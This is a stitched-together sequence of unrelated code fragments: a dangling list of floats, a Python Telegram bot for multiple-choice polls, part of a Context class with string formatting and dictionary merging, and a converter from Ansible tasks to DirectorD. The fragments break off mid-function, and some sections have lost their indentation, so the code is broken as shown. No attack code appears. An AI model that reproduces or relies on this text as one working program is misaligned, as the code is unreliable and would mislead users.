0.17458735759125532,
0.3009405369121568,
0.4183812370244567,
0.4456704554616094,
0.44848871538985313,
0.4486524322927688,
0.4486586792251214,
0.6266937936726023,
0.7094323863920771,
0.8348605795989432,
0.8476776667345235,
0.8865379864172973,
0.9454485809179489,
0.9464413324093723,
0.9509562397257743,
0.9646450552731404,
0.9853967183703066,
0.9854443162626187,
0.9857352070455746,
0.9870754641922909,
0.9912454548380962,
1.0],
'ICE': [0.0039437550110208615,
0.006241466155502256,
0.007106607147634448,
0.0073265377623919865,
0.007368684812040395,
0.01898664966379224,
0.02796127846790154,
0.03142763265296362,
0.0323201940872442,
0.07151803578029768,
0.1017975282392845,
0.11349265766443753,
0.2126798311280843,
0.28929979644247444,
0.4566235563703249,
0.5977569290571388,
0.7270109468323708,
0.7566045872183932,
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Notes:
InlineKeyboardButton:
callback_data:
has a common format of ".method_name param1 param2 ...".
currently used methods are:
- .vote <poll_id> <answer_id>
vote for an answer <answer_id> in poll <poll_id>.
- .update <poll_id>
update poll view in private chat with poll's owner.
- .admin_vote <poll_id>
poll's owner want to vote him/herself, show keyboard with answers.
- .stats <poll_id>
upload statistics in json to poll's owner.
"""
import json
import re
import sys
import urllib.parse
import warnings
from io import BytesIO
from typing import Callable, List, Optional, TypeVar
from uuid import uuid4
from dotenv import load_dotenv
from telegram import (
CallbackQuery,
InlineKeyboardButton,
InlineKeyboardMarkup,
InlineQuery,
InlineQueryResultArticle,
InputTextMessageContent,
Message,
Update,
User,
)
from telegram.ext import (
CallbackContext,
CallbackQueryHandler,
CommandHandler,
ConversationHandler,
Dispatcher,
Filters,
InlineQueryHandler,
MessageHandler,
Updater,
)
from . import log
from .config import Configuration
from .filters import FiltersExt
from .model.answer import Answer
from .model.poll import MAX_ANSWERS, MAX_POLLS_PER_USER, Poll
from .paginate import paginate
from .state import PersistentConversationHandler, StateManager
from .util import ignore_not_modified
T = TypeVar('T')  # generic type parameter for typed helpers in this module
logger = log.getLogger(__name__)
logger.setLevel(log.INFO)
POLLS_PER_PAGE = 5  # number of polls shown per page in the /manage listing
###############################################################################
# utils
###############################################################################
HandlerCallback = Callable[[Update, CallbackContext], Optional[int]]  # common handler signature
def inline_keyboard_markup_answers(poll: Poll) -> InlineKeyboardMarkup:
    """Build the voting keyboard: one row per answer, captioned with the
    answer text and its current vote count (count omitted when zero)."""
    def caption(title: str, count: int):
        # a zero count is hidden so fresh polls look clean
        return title if count == 0 else "{} - {}".format(title, count)
    rows = []
    for answer in poll.answers():
        button = InlineKeyboardButton(
            caption(answer.text, len(answer.voters())),
            callback_data=".vote {} {}".format(poll.id, answer.id))
        rows.append([button])
    return InlineKeyboardMarkup(rows)
def inline_keyboard_markup_admin(poll: Poll) -> InlineKeyboardMarkup:
    """Build the owner-facing keyboard: publish / share / update / vote / stats."""
    pid = poll.id
    rows = []
    rows.append([InlineKeyboardButton("publish", switch_inline_query=str(pid))])
    rows.append([InlineKeyboardButton("share link", callback_data=".share {}".format(pid))])
    rows.append([
        InlineKeyboardButton("update", callback_data=".update {}".format(pid)),
        InlineKeyboardButton("vote", callback_data=".admin_vote {}".format(pid))])
    rows.append([InlineKeyboardButton("statistics", callback_data=".stats {}".format(pid))])
    return InlineKeyboardMarkup(rows)
def send_vote_poll(message: Message, poll: Poll):
    """Reply to *message* with the poll text and its public voting keyboard."""
    message.reply_text(
        str(poll),
        parse_mode='MarkdownV2',
        disable_web_page_preview=True,
        reply_markup=inline_keyboard_markup_answers(poll))
def send_admin_poll(message: Message, poll: Poll):
    """Reply to *message* with the poll text and the owner's admin keyboard."""
    message.reply_text(
        str(poll),
        parse_mode='MarkdownV2',
        disable_web_page_preview=True,
        reply_markup=inline_keyboard_markup_admin(poll))
###############################################################################
# handlers: global
###############################################################################
def error(update: Update, context: CallbackContext):
    """Global error handler: log the failing update and its exception.

    Registered as the dispatcher's error handler, so it must not raise itself.
    """
    import traceback
    # lazy %-args: the message is only formatted if the level is enabled
    # (the original eagerly formatted with `%` before calling the logger)
    logger.warning('Update "%s" caused error "%s"', update, context.error)
    traceback.print_exc(file=sys.stdout)
def about(update: Update, context: CallbackContext):
    """Send a short usage blurb describing what the bot does."""
    update.message.reply_text(
        "This bot will help you create multiple-choice polls. "
        "Use /start to create a multiple-choice poll here, "
        "then publish it to groups or send it to individual friends.")
def manage(update: Update, context: CallbackContext):
    """Handle /manage: list the caller's polls as a paginated message,
    or offer a "create new poll" button when the user has none yet."""
    message: Message = update.message
    user_id = message.from_user.id
    polls = Poll.query(user_id, limit=MAX_POLLS_PER_USER)
    if not polls:  # idiomatic emptiness check (was: len(polls) == 0)
        message.reply_text(
            text="you don't have any polls yet.",
            reply_markup=InlineKeyboardMarkup(
                [[InlineKeyboardButton("create new poll", callback_data=".start")]]))
    else:
        message.reply_text(
            manage_polls_message(polls, 0, POLLS_PER_PAGE),
            parse_mode=None,
            disable_web_page_preview=True,
            reply_markup=paginate(len(polls), 0, POLLS_PER_PAGE,
                                  manage_polls_callback_data))
def manage_polls_callback_data(offset):
    """Build the callback-data payload that pages the poll list to *offset*."""
    payload = '.manage {}'.format(offset)
    return payload
def manage_polls_message(polls: List[Poll], offset: int, count: int) -> str:
    """Render one page of the user's polls as plain text.

    Each entry shows a 1-based ordinal, the poll topic, and a /view_<id>
    command line; entries are separated by blank lines.
    """
    page = polls[offset: offset + count]
    entries = []
    for i, poll in enumerate(page, start=offset):
        entries.append("{}. {}\n/view_{}".format(i + 1, poll.topic, poll.id))
    return "your polls\n\n{}".format("\n\n".join(entries))
def start_with_poll(update: Update, context: CallbackContext):
    """Handle a deep-link /start carrying a poll id: show the voting view."""
    poll_id = int(context.match.groups()[0])
    send_vote_poll(update.message, Poll.load(poll_id))
def view_poll(update: Update, context: CallbackContext):
    """Handle /view_<id>: show the admin view, but only to the poll's owner."""
    message: Message = update.message
    poll = Poll.load(int(context.match.groups()[0]))
    if poll.owner.id != message.from_user.id:
        return  # silently ignore anyone who is not the owner
    send_admin_poll(message, poll)
###############################################################################
# conversation: create new poll
###############################################################################
QUESTION, FIRST_ANSWER, ANSWERS, = range(3)  # conversation states for the poll-creation dialogue
states = StateManager()  # per-user draft-poll state, indexed by telegram user (see StateManager)
def start_from_command(update: Update, context: CallbackContext) -> int:
    """Begin the poll-creation conversation from the /start command."""
    return start_with_user(update.message.from_user, context)
def start_from_callback_query(update: Update, context: CallbackContext) -> int:
    """Begin the poll-creation conversation from a '.start' inline button."""
    query: CallbackQuery = update.callback_query
    query.answer()  # acknowledge the button press so the client stops spinning
    return start_with_user(query.from_user, context)
def start_with_user(user: User, context: CallbackContext) -> int:
    """Reset the user's draft poll and ask for the question."""
    context.bot.send_message(
        user.id,
        "ok, let's create a new poll. send me a question first.")
    states[user].reset()
    return QUESTION
def add_question(update: Update, context: CallbackContext) -> int:
    """Store the poll question and prompt for the first answer option."""
    message: Message = update.message
    question = message.text
    states[message.from_user].add_question(question)
    message.reply_text(
        "creating a new poll: '{}'\n\n"
        "please send me the first answer option".format(question))
    return FIRST_ANSWER
def add_answer(update: Update, context: CallbackContext) -> int:
    """Add an answer option; finish automatically once MAX_ANSWERS is reached.

    Returns:
        Next conversation state: the result of create_poll() when the
        answer limit is hit, otherwise ANSWERS.
    """
    message: Message = update.message
    # Consistency fix: use the local `message` alias (was update.message.text).
    poll: Poll = states[message.from_user].add_answer(message.text)
    if len(poll.answers()) == MAX_ANSWERS:
        return create_poll(update, context)
    message.reply_text(
        "nice. feel free to add more answer options.\n\n"
        "when you've added enough, simply send /done.")
    return ANSWERS
def create_poll(update: Update, context: CallbackContext) -> int:
    """Persist the drafted poll, confirm to the user and show the admin view."""
    author = update.message.from_user
    poll = states[author].create_poll()
    poll.store()  # persists the poll; poll.id is used below
    logger.debug("user id %d created poll id %d", author.id, poll.id)
    confirmation = (
        "poll created. "
        "now you can publish it to a group or send it to your friend in a private message.")
    update.message.reply_text(confirmation)
    send_admin_poll(update.message, poll)
    return ConversationHandler.END
def cancel(update: Update, context: CallbackContext) -> int:
    """Abort the poll-creation conversation and clear the user's draft."""
    message: Message = update.message
    states[message.from_user].reset()
    message.reply_text(
        "the command has been cancelled. just send me something if you want to start.")
    return ConversationHandler.END
def cancel_nothing(update: Update, context: CallbackContext):
    """Reply to /cancel when there is no active conversation to cancel."""
    update.message.reply_text(
        "nothing to cancel anyway. just send me something if you want to start.")
###############################################################################
# handlers: inline
###############################################################################
def inline_query(update: Update, context: CallbackContext):
    """Answer an inline query with the caller's polls matching the query text."""
    # local renamed so it no longer shadows this function's own name
    incoming: InlineQuery = update.inline_query
    polls: List[Poll] = Poll.query(incoming.from_user.id, incoming.query)
    results = [
        InlineQueryResultArticle(
            id=str(uuid4()),
            title=poll.topic,
            input_message_content=InputTextMessageContent(
                message_text=str(poll),
                parse_mode='MarkdownV2',
                disable_web_page_preview=True),
            description=" / ".join(answer.text for answer in poll.answers()),
            reply_markup=inline_keyboard_markup_answers(poll))
        for poll in polls
    ]
    incoming.answer(
        results,
        is_personal=True,
        cache_time=30,
        switch_pm_text="Create new poll",
        switch_pm_parameter="new_poll")
###############################################################################
# handlers: callback query
###############################################################################
def callback_query_vote(update: Update, context: CallbackContext):
    """Toggle the calling user's vote on one answer and refresh the poll view.

    Callback data carries (poll_id, answer_id) as regex groups.
    """
    query: CallbackQuery = update.callback_query
    poll_id, answer_id = map(int, context.match.groups())
    answer: Optional[Answer] = None
    # cases:
    # - 0, error: poll / answer not found due to system fault of fraud attempt
    # - 1, set: user don't have active vote in this answer in this poll
    # - 2, reset: user has active vote in this answer in this poll.
    poll = Poll.load(poll_id)
    if poll is not None:
        answer: Answer = next((a for a in poll.answers() if a.id == answer_id), None)
    if answer is None:
        # case 0, error
        logger.debug("poll not found, query data %r from user id %d", query.data, query.from_user.id)
        query.answer(text="sorry, this poll not found. probably it has been closed.")
        with ignore_not_modified():
            # drop the stale inline keyboard so the dead poll can't be clicked again
            query.edit_message_reply_markup(reply_markup=InlineKeyboardMarkup([]))
    else:
        poll: Poll = answer.poll()
        user: User = query.from_user
        # this user's existing vote on this answer, if any
        user_old = next(iter(u for u in answer.voters() if u.id == user.id), None)
        if user_old is None:
            # case 1, set
            logger.debug("user id %d voted for answer id %d in poll id %d",
                         query.from_user.id, answer.id, answer.poll().id)
            answer.voters().append(user)
            answer.store()
            query.answer(text="you voted for '{}'.".format(answer.text))
        else:
            # case 2, reset
            logger.debug("user id %d took his/her reaction back from answer id %d in poll id %d",
                         query.from_user.id, answer.id, answer.poll().id)
            answer.voters().remove(user_old)
            answer.store()
            query.answer(text="you took your reaction back.")
        # in both cases 1 and 2 update the view; owners chatting with the bot
        # get the admin keyboard, everyone else the voting keyboard
        if query.message is not None and poll.owner.id == query.message.chat.id:
            markup = inline_keyboard_markup_admin(poll)
        else:
            markup = inline_keyboard_markup_answers(poll)
        with ignore_not_modified():
            query.edit_message_text(
                text=str(poll),
                parse_mode='MarkdownV2',
                disable_web_page_preview=True,
                reply_markup=markup)
def callback_query_admin_vote(update: Update, context: CallbackContext):
    """Owner pressed 'vote' on the admin view: swap in the voting keyboard."""
    query: CallbackQuery = update.callback_query
    poll = Poll.load(int(context.match.groups()[0]))
    logger.debug("owner user id %d want to vote in poll id %d",
                 query.from_user.id, poll.id)
    with ignore_not_modified():
        query.edit_message_reply_markup(
            reply_markup=inline_keyboard_markup_answers(poll))
def callback_query_update(update: Update, context: CallbackContext):
    """Re-render the admin poll view with fresh voting results."""
    query: CallbackQuery = update.callback_query
    poll = Poll.load(int(context.match.groups()[0]))
    query.answer(text='\u2705 results updated.')
    with ignore_not_modified():
        query.edit_message_text(
            text=str(poll),
            parse_mode='MarkdownV2',
            disable_web_page_preview=True,
            reply_markup=inline_keyboard_markup_admin(poll))
def callback_query_stats(update: Update, context: CallbackContext):
    """Generate a JSON statistics file for a poll and send it to its owner.

    Silently ignores (with a debug log) requests from non-owners.
    """
    query: CallbackQuery = update.callback_query
    poll_id = int(context.match.groups()[0])
    poll = Poll.load(poll_id)
    if poll.owner.id != query.from_user.id:
        logger.debug("user id %d attempted to access stats on poll id %d owner %d",
                     query.from_user.id, poll.id, poll.owner.id)
        return
    # (removed unused local: `message = query.message` was never read)
    # Per answer: total voter count plus a projection of each voter with
    # empty/None fields (e.g. missing username) dropped.
    data = {
        'answers': [{
            'id': answer.id,
            'text': answer.text,
            'voters': {
                'total': len(answer.voters()),
                '_': [{
                    k: v
                    for k, v in {
                        'id': voter.id,
                        'first_name': voter.first_name,
                        'last_name': voter.last_name,
                        'username': voter.username,
                    }.items()
                    if v
                } for voter in answer.voters()]
            }
        } for answer in poll.answers()]
    }
    content = json.dumps(data, indent=4, ensure_ascii=False)
    raw = BytesIO(content.encode('utf-8'))
    name = "statistics for poll #{}.json".format(poll.id)
    context.bot.send_document(poll.owner.id, raw, filename=name)
    query.answer()
def callback_query_manage(update: Update, context: CallbackContext):
    """Flip to another page of the caller's poll list (pagination callback)."""
    query: CallbackQuery = update.callback_query
    offset = int(context.match.groups()[0])
    polls: List[Poll] = Poll.query(query.from_user.id, limit=MAX_POLLS_PER_USER)
    with ignore_not_modified():
        page_text = manage_polls_message(polls, offset, POLLS_PER_PAGE)
        page_markup = paginate(len(polls), offset, POLLS_PER_PAGE,
                               manage_polls_callback_data)
        query.edit_message_text(
            text=page_text,
            parse_mode=None,
            disable_web_page_preview=True,
            reply_markup=page_markup)
def callback_query_share(update: Update, context: CallbackContext):
    """Send the caller a deep link they can forward to share the poll."""
    query: CallbackQuery = update.callback_query
    poll_id = context.match.groups()[0]
    link = "https://t.me/{}?start=poll_id={}".format(
        context.bot.username, poll_id)
    context.bot.send_message(
        query.from_user.id,
        link,
        parse_mode=None,
        disable_web_page_preview=True,
    )
    query.answer()
def callback_query_not_found(update: Update, context: CallbackContext):
    """Fallback for callback data that no other handler recognised."""
    query: CallbackQuery = update.callback_query
    logger.debug("invalid callback query data %r from user id %d",
                 query.data, query.from_user.id)
    query.answer("invalid query")
def get_updater(token: str) -> Updater:
    """Create the PTB Updater (context-based callbacks) for the given token."""
    return Updater(token, use_context=True)
def configure_updater(updater: Updater):
# Get the dispatcher to register handlers
dp: Dispatcher = updater.dispatcher
dp.add_handler(MessageHandler(Filters.regex(r"/start poll_id=(.+)"), start_with_poll))
with warnings.catch_warnings():
# see per_message param below
warnings.filterwarnings("ignore", category=UserWarning, module=re.escape(ConversationHandler.__module__))
dp.add_handler(PersistentConversationHandler(
entry_points=[
CommandHandler("start", start_from_command),
CallbackQueryHandler(start_from_callback_query, pattern=r"\.start"),
# we sacrifice the ability to use /start as a reentry point, but we
# gain from avoiding certain dirty hack with internals of
# conversation handler's implementation details.
MessageHandler(FiltersExt.non_command_text, add_question),
],
allow_reentry=False,
states={
QUESTION: [
MessageHandler(FiltersExt.non_command_text, add_question)],
FIRST_ANSWER: [
MessageHandler(FiltersExt.non_command_text, add_answer)],
ANSWERS: [
MessageHandler(FiltersExt.non_command_text, add_answer),
CommandHandler("done", create_poll),
]
},
fallbacks=[
# entry points can still be used as reentry-points, but in a form of fallbacks
CommandHandler("start", start_from_command),
CallbackQueryHandler(start_from_callback_query, pattern=r"\.start"),
# just a normal "`break` from the loop"
CommandHandler("cancel", cancel),
],
per_chat=True,
| |
default: if value is None, set to this
out_type: cast return as this type
Returns:
Formatted value of type out_type
"""
if value is None:
value = default
if isinstance(value, SpecialTagDirective):
result = value.get_value(self)
return types.cast_to_type(result, out_type)
if isinstance(value, str):
result = self.formatter.vformat(value, None, self)
result_type = type(result)
if out_type is result_type:
# no need to cast, result is already desired type.
return result
elif out_type is bool:
# casting a str to bool is always True, hence special case. If
# the str value is 'False'/'false', presumably user can
# reasonably expect a bool False response.
return types.cast_to_bool(result)
else:
return out_type(result)
else:
return out_type(value)
def get_formatted_value(self, input_value):
    """Run token substitution on input_value against context.

    If input_value is a formattable string or SpecialTagDirective, return
    the formatted result. If it is an iterable (dict, list, set, tuple),
    iterate it recursively and format every formattable object found;
    mappings have both key and value formatted. Anything else (e.g. an
    int) comes back untouched.

    Choosing between get_formatted() and get_formatted_value():
    - get_formatted gets a context[key] value with formatting applied.
    - get_formatted_value is for any input object.

    An input string consisting of a single formatting expression and
    nothing else, input_value = '{key1}', returns the object at that
    context path, so the return keeps the source object's type, with token
    substitutions run on it iteratively. By comparison, multiple
    expressions and/or literal text, input_value = '{key1} literal {key2}',
    always produce a str, e.g "Piping down the valleys wild".

    Note this is deliberately not a full deepcopy: dict, list, set and
    tuple are handled for iteration, without any especial cuteness for
    other types or types not derived from these.

    Args:
        input_value: Any object to format.

    Returns:
        Formatted value with {substitutions} made from context. Iterables
        come back identical in structure to the input, except where
        formatting changed a string to its evaluated value. If input was
        not a string/iterable, returns input_value untouched.
    """
    return self.formatter.vformat(input_value, None, self)
def get_processed_string(self, input_string):
    """Deprecated alias: use get_formatted_value(input_value) instead."""
    import warnings
    warnings.warn(
        ("Use get_formatted_value(input_value) instead of "
         "get_processed_string"),
        DeprecationWarning)
    return self.formatter.vformat(input_string, None, self)
def iter_formatted_strings(self, iterable_strings):
    """Lazily yield each input string with {substitutions} applied.

    Example: with context {'key1': 'down', 'key2': 'valleys'}, the input
    'Piping {key1} the {key2} wild' yields 'Piping down the valleys wild'.

    Args:
        iterable_strings: Iterable of str, e.g. a file-like object.

    Yields:
        str: formatted line.
    """
    yield from (self.formatter.vformat(line, None, self)
                for line in iterable_strings)
def keys_exist(self, *keys):
    """Check whether each of the given keys exists in context.

    Args:
        *keys: str key names to look up.

    Returns:
        tuple of bool, one per key, in the same order as *keys.

    Sample:
        k1, = context.keys_exist('k1')
        k1, k2, k3 = context.keys_exist('k1', 'k2', 'k3')
    """
    known = self.keys()
    return tuple(candidate in known for candidate in keys)
def keys_of_type_exist(self, *keys):
    """Check that keys exist in context and hold the expected types.

    Args:
        *keys: tuple(str, type) pairs - key name plus its expected type.

    Returns:
        Tuple of namedtuple ContextItemInfo, same order as *keys:
        ContextItemInfo(key, key_in_context, expected_type,
                        is_expected_type, has_value)

    With a single key, remember the trailing comma on assignment:
        # one
        a, = context.keys_of_type_exist('a')
        # > 1
        a, b = context.keys_of_type_exist('a', 'b')
    """
    infos = []
    for key, expected_type in keys:
        present = key in self.keys()
        infos.append(ContextItemInfo(
            key=key,
            key_in_context=present,
            expected_type=expected_type,
            # type/value checks only make sense when the key is present
            is_expected_type=(isinstance(self[key], expected_type)
                              if present else None),
            has_value=present and self[key] is not None))
    return tuple(infos)
def merge(self, add_me):
    """Merge add_me into context and applies interpolation.

    Bottom-up merge where add_me merges into context. Applies string
    interpolation where the type is a string. Where a key exists in
    context already, add_me's value will overwrite what's in context
    already.

    Supports nested hierarchy. add_me can contains dicts/lists/enumerables
    that contain other enumerables et. It doesn't restrict levels of
    nesting, so if you really want to go crazy with the levels you can, but
    you might blow your stack.

    If something from add_me exists in context already, but add_me's value
    is of a different type, add_me will overwrite context. Do note this.
    i.e if you had context['int_key'] == 1 and
    add_me['int_key'] == 'clearly not a number', the end result would be
    context['int_key'] == 'clearly not a number'

    If add_me contains lists/sets/tuples, this merges these
    additively, meaning it appends values from add_me to the existing
    sequence.

    Args:
        add_me: dict. Merge this dict into context.

    Returns:
        None. All operations mutate this instance of context.
    """
    def merge_recurse(current, add_me):
        """Walk the current context tree in recursive inner function.

        On 1st iteration, current = self(i.e root of context)
        On subsequent recursive iterations, current is wherever you're at
        in the nested context hierarchy.

        Args:
            current: dict. Destination of merge.
            add_me: dict. Merge this to current.
        """
        for k, v in add_me.items():
            # key supports interpolation
            k = self.get_formatted_value(k)
            # str not mergable, so it doesn't matter if it exists in dest
            if isinstance(v, (str, SpecialTagDirective)):
                # just overwrite dest - str adds/edits indiscriminately
                current[k] = self.get_formatted_value(v)
            elif isinstance(v, (bytes, bytearray)):
                # bytes aren't mergable or formattable
                # only here to prevent the elif on enumerables catching it
                current[k] = v
            # deal with things that are mergable - exists already in dest
            elif k in current:
                if types.are_all_this_type(Mapping, current[k], v):
                    # it's dict-y, thus recurse through it to merge since
                    # it exists in dest
                    merge_recurse(current[k], v)
                elif types.are_all_this_type(list, current[k], v):
                    # it's list-y. Extend mutates existing list since it
                    # exists in dest
                    current[k].extend(
                        self.get_formatted_value(v))
                elif types.are_all_this_type(tuple, current[k], v):
                    # concatenate tuples
                    current[k] = (
                        current[k] + self.get_formatted_value(v))
                elif types.are_all_this_type(Set, current[k], v):
                    # join sets
                    current[k] = (
                        current[k] | self.get_formatted_value(v))
                else:
                    # at this point it's not mergable
                    current[k] = self.get_formatted_value(v)
            else:
                # at this point it's not mergable, nor in context
                current[k] = self.get_formatted_value(v)
    # first iteration starts at context dict root
    merge_recurse(self, add_me)
def pystring_globals_clear(self):
    """Empty the pystring globals namespace in place."""
    self._pystring_globals.clear()
def pystring_globals_update(self, *args, **kwargs):
    """Update the pystring globals namespace, dict.update-style.

    Args:
        *args/**kwargs:
            - iterable of key/value pairs
            - dict

    Returns:
        int: size of the pystring globals namespace after the update.
    """
    # _pystring_globals is initialized to {} on Context init, so no None
    # handling is necessary here.
    globals_ns = self._pystring_globals
    globals_ns.update(*args, **kwargs)
    return len(globals_ns)
def set_defaults(self, defaults):
"""Set defaults in context if keys do not exist already.
Adds the input dict(defaults) into the context, only where keys in
defaults do not already exist in context. Supports nested hierarchies.
Example:
Given a context like this:
key1: value1
key2:
key2.1: value2.1
key3: None
And defaults input like this:
key1: 'updated value here won't overwrite since it already exists'
key2:
key2.2: value2.2
key3: 'key 3 exists so I won't overwrite
Will result in context:
key1: value1
key2:
key2.1: value2.1
key2.2: value2.2
key3: None
Args:
defaults: dict. Add this dict into context.
Returns:
None. All operations mutate this instance of context.
"""
def defaults_recurse(current, defaults):
"""Walk the current context tree in recursive inner function.
On 1st iteration, current = self(i.e root of context)
On subsequent recursive iterations, current is wherever you're at
in the nested context hierarchy.
Args:
current: dict. Destination of merge.
defaults: dict. Add this to current if keys don't exist
already.
"""
for k, v in defaults.items():
# key supports interpolation
k = self.get_formatted_value(k)
if k in current:
if types.are_all_this_type(Mapping, current[k], v):
# it's dict-y, thus recurse through it to check if it
# contains child items that | |
# Copyright <NAME> <<EMAIL>>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from ruamel.yaml.comments import CommentedMap as Map
from a2dd.constants import BLOCK_ATTRS, PLAYBOOK_ATTRS, TASK_ATTRS
from a2dd.utils import get_task_action, yaml_dump, yaml_load, string2dict
class AnsibleTask:
    """AnsibleTask class parses a single task."""

    def __init__(self, task, block=None, include=None, role=None, play=None):
        """Set context for task.

        Args:
            task (dict): Task loaded from YAML to parse
            block (dict, optional): Block context. Defaults to None.
            include (dict, optional): Include context. Defaults to None.
            role (dict, optional): Role context. Defaults to None.
            play (dict, optional): Playbook context. Defaults to None.
        """
        self.task = task
        self.block = block
        self.include = include
        self.role = role
        self.play = play

    def parse(self):
        """Parser for task.

        Raises:
            ValueError: if task is block or include

        Returns:
            list: List of DirectorD tasks with comments as ruamel Maps
        """
        task_module = get_task_action(self.task)
        # Let's assume task names are unique in all collections we use
        # Remove collection part of it
        if "." in task_module:
            new_task_module = task_module.split(".")[-1]
            self.task[new_task_module] = self.task.pop(task_module)
            task_module = new_task_module
        if isinstance(self.task[task_module], str):
            self.task[task_module] = string2dict(self.task[task_module])
        if task_module in ("block", "include", "include_tasks"):
            raise ValueError(
                f"Can not parse module {task_module} - "
                "use a specific class for it"
            )
        parsed_attrs = (task_module, "name")
        task_args = {
            k: v for k, v in self.task.items() if k not in parsed_attrs
        }
        name = self.task.get("name", "Unnamed task")
        func_name = "task_" + task_module
        tasks_parsed = []
        if not hasattr(self, func_name):
            # No converter yet: emit an ECHO placeholder and keep the whole
            # original task as context for a future implementation.
            # BUG FIX: keep the raw dict here - the previous code called
            # yaml_dump() now AND again below, yaml-encoding an
            # already-dumped string.
            task_context = self.task
            tasks_parsed = [
                Map(
                    {
                        "NAME": name,
                        "ECHO": (
                            f"Conversion of task module '{task_module}' is not"
                            " implemented yet!"
                        ),
                    }
                )
            ]
        else:
            parsed, task_context = getattr(self, func_name)(task_args)
            if parsed:
                for each_task in parsed:
                    named_task = {"NAME": name}  # for NAME to be on the top
                    named_task.update(each_task)
                    tasks_parsed.append(Map(named_task))
        if task_context:
            # single point where leftover context is serialized to YAML
            task_context = yaml_dump(task_context)
        context = ""
        if task_context:
            context = f"TASK-CONTEXT:\n{task_context}"
        # prepend surrounding contexts (innermost first) as comment text
        for add_context in (self.block, self.include, self.role, self.play):
            if add_context and "context" in add_context:
                context = "\n".join([add_context["context"], context])
                context = f"\n{context}"
        if context:
            for task in tasks_parsed:
                task.yaml_set_start_comment(context)
        return tasks_parsed

    def task_shell(self, task_args):
        """Parse shell task.

        Args:
            task_args (dict): task args not otherwise parsed

        Raises:
            ValueError: if shell command is not found in task

        Returns:
            tuple: (list, dict): List of DirectorD tasks as dictionaries
                plus leftover (unparsed) args kept as task context.
        """
        exe = []
        action = "shell" if "shell" in self.task else "command"
        run = self.task[action]
        if isinstance(run, dict):
            if "args" in self.task and "cmd" in self.task["args"]:
                run = self.task["args"]["cmd"]
            if "cmd" in run:
                run = run["cmd"]
        if not isinstance(run, str):
            raise ValueError(f"Can not get shell command from: {self.task}")
        if "chdir" in self.task.get("args", {}):
            exe.append(f'cd {self.task["args"]["chdir"]};')
        elif "chdir" in self.task[action]:
            exe.append(f'cd {self.task[action]["chdir"]};')
        # export environment from play, block and task scope (in that order)
        for env in [
            i for i in (self.play, self.block, self.task) if i is not None
        ]:
            if "environment" in env:
                for k, v in env["environment"].items():
                    exe.append(f'export {k}="{v}";')
        exe.append(run)
        # Not parsed lines go to task-context for future implementation
        for i in ("environment", "chdir", "name", "args"):
            task_args.pop(i, None)
        return [{"RUN": "\n".join(exe)}], task_args

    def task_command(self, task_args):
        """Parse command task (identical handling to shell).

        Args:
            task_args (dict): task args not otherwise parsed

        Raises:
            ValueError: if command is not found in task

        Returns:
            tuple: (list, dict): List of DirectorD tasks as dictionaries
                plus leftover (unparsed) args kept as task context.
        """
        return self.task_shell(task_args)

    def task_set_fact(self, task_args):
        """Parse set_fact task.

        Args:
            task_args (dict): task args not otherwise parsed

        Returns:
            tuple: (list, dict): List of DirectorD ARG tasks plus leftover
                args kept as task context.
        """
        args = []
        for fact_name, fact_value in self.task["set_fact"].items():
            # 'cacheable' is ansible bookkeeping, not a fact to export
            if fact_name != "cacheable":
                args.append({"ARG": f'{fact_name} "{fact_value}"'})
        return args, task_args

    def task_dnf(self, task_args):
        """Parse dnf task.

        Args:
            task_args (dict): task args not otherwise parsed

        Raises:
            ValueError: on dnf options other than name/state

        Returns:
            tuple: (list, dict): List of DirectorD tasks plus leftover
                args kept as task context.
        """
        args = []
        pkgs = self.task["dnf"]["name"]
        state = self.task["dnf"].get("state", "present")
        if pkgs == "*" and state == "latest":
            # full system update has its own spelling
            return [{"RUN": "dnf update -y"}], task_args
        if isinstance(pkgs, str):
            pkgs = [pkgs]
        if state == "latest":
            args.append("--latest")
        elif state == "absent":
            args.append("--absent")
        for k, v in self.task["dnf"].items():
            if k not in ("name", "state"):
                raise ValueError(f"Not implemented key in dnf task: {k}: {v}")
        dnf = [{"DNF": " ".join(args + pkgs)}]
        return dnf, task_args

    def task_setup(self, task_args):
        """Parse setup task.

        Args:
            task_args (dict): task args not otherwise parsed

        Returns:
            tuple: (list, dict): List of DirectorD tasks plus leftover
                args kept as task context.
        """
        # We don't have filters now, just run facter for all
        setup = [{"FACTER": ""}]
        return setup, task_args

    def task_service(self, task_args):
        """Parse service task.

        Args:
            task_args (dict): task args not otherwise parsed

        Returns:
            tuple: (list, dict): List of DirectorD tasks plus leftover
                args kept as task context.
        """
        servargs = []
        names = self.task["service"]["name"]
        if isinstance(names, str):
            names = [names]
        state = self.task["service"].get("state")
        if state is not None:
            if state == "stopped":
                servargs.append("--stopped")
            elif state == "restarted":
                servargs.append("--restarted")
            elif state == "reloaded":
                servargs.append("--reloaded")
        enabled = self.task["service"].get("enabled")
        if enabled is not None:
            if enabled:
                servargs.append("--enable")
            else:
                servargs.append("--disable")
        service = [{"SERVICE": " ".join(servargs + names)}]
        return service, task_args

    def task_systemd(self, task_args):
        """Parse systemd task.

        Args:
            task_args (dict): task args not otherwise parsed

        Returns:
            tuple: (list, dict): List of DirectorD tasks plus leftover
                args kept as task context.
        """
        servargs = []
        name = self.task["systemd"]["name"]
        state = self.task["systemd"].get("state")
        if state is not None:
            if state == "stopped":
                servargs.append("--stopped")
            elif state == "restarted":
                servargs.append("--restarted")
            elif state == "reloaded":
                servargs.append("--reloaded")
        enabled = self.task["systemd"].get("enabled")
        if enabled is not None:
            if enabled:
                servargs.append("--enable")
            else:
                servargs.append("--disable")
        masked = self.task["systemd"].get("masked")
        if masked is not None:
            if masked:
                servargs.append("--mask")
            else:
                servargs.append("--unmask")
        reload = self.task["systemd"].get(
            "daemon_reload", self.task["systemd"].get("daemon-reload")
        )
        if reload:
            servargs.append("--daemon-reload")
        service = [{"SERVICE": " ".join(servargs + [name])}]
        return service, task_args
class AnsibleBlock:
    """AnsibleBlock class parses a single tasks block."""

    def __init__(self, block, **kwargs):
        """Parse a block of tasks, passing all context arguments to tasks.

        Args:
            block (dict): Dictionary of block loaded from YAML
            **kwargs: extra context forwarded to the contained tasks.
        """
        self.block = block
        self.kwargs = kwargs

